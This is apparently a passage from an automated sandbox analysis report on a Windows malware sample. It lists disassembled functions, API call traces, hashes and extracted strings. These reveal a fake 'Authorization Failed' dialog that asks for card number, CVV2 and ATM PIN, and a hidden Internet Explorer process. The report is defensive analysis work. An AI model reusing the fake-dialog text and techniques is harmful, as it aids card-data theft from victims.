                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 92 4079e1-4079e3 82->92 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 89 4079b1 85->89 90 4079ab 85->90 86->80 87->82 91 4079ca-4079cd 87->91 89->82 90->85 91->82 93 4079c2 91->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            Function 00406753 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99
                            Function 00406075 Relevance: 124.7, APIs: 52, Strings: 19, Instructions: 488windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D
                            Function 0040570C Relevance: 122.9, APIs: 56, Strings: 14, Instructions: 371stringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
